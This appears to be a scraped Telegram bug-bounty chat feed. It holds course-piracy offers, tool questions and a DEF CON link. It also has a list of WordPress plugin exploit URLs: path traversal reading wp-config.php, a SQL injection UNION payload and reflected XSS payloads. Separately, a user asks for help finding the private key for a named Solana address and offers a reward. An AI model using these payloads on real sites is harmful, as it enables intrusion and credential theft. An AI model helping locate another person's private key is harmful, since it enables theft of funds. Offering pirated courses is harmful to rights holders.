Guys this course is worth 15000 but we are providing for INR 1800 only if anyone interested kindly tell me
Читать полностью…Small question on burpsuite im doing a bug bounty and I added some payloads on the get request and cookies including headers I tested each individually and all 200 OK on the response but when u search on the response it's not reflecting I tried others some were 403 and some went on 200 but what could be the issue including I'm using burpsuite community edition
Читать полностью…Guys anyone suggest me tools
For big bounty
What tool have to use for finding apps bugs
I have the details of the address but I want the page number on which it is.
Because the page number has the private key associated with the address.
I already have a script but now it is rate limiting my queries.
I thought someone might find the page number th other way and I can offer him the reward
Does anyone have Nahamsec's Intro to Bug Bounty Hunting and Web Application Hacking on Udemy? I will provide Hacktify's BBHv1/BBHv2 for it's exchange
Читать полностью…DEF CON 32 presentations
https://media.defcon.org/DEF%20CON%2032/DEF%20CON%2032%20presentations/
Wordpress Endpoints to look - Part 1
check this if you have Wordpress (plugins).
/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
/wp-content/uploads/adminer.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
/wp-content/plugins/wp-phpmyadmin/wp-phpmyadmin/phpmyadmin/
/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=-1+union+select+1,2,3,4,concat(0x7e7e7e,74657374,0x7c7c7c,md5(74657374),0x7e7e7e),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--
/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes
/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
Upload to the root directory of your site the readme.txt file that contains “Bug bounty chat” to confirm that this is your site.
And only after that discount the link to your site. Otherwise your post will be deleted and you will be blocked
👾 AWS Hacked : Error In Configuration Affects 110,000 Domains
ENV file vulnerabilities resulted in massive exploitation. Over 110,000 domains have been affected by a significant ransomware campaign
🗿it is recommended that organisations wishing to secure their cloud environments employ temporary credentials, stick to the least privilege principles, and enable all available event logs.
This is the website url: https://privatekeyfinder.io/private-keys/solana/
I want to find the page number related to this solana address:
4Be9CvxqHW6BYiRAxW9Q3xu1ycTMWaL5z8NX4HR3ha7t
Hi! Can you please help me solve the problem with acunetix? Is there anyone here who understands acunetix very well?
Читать полностью…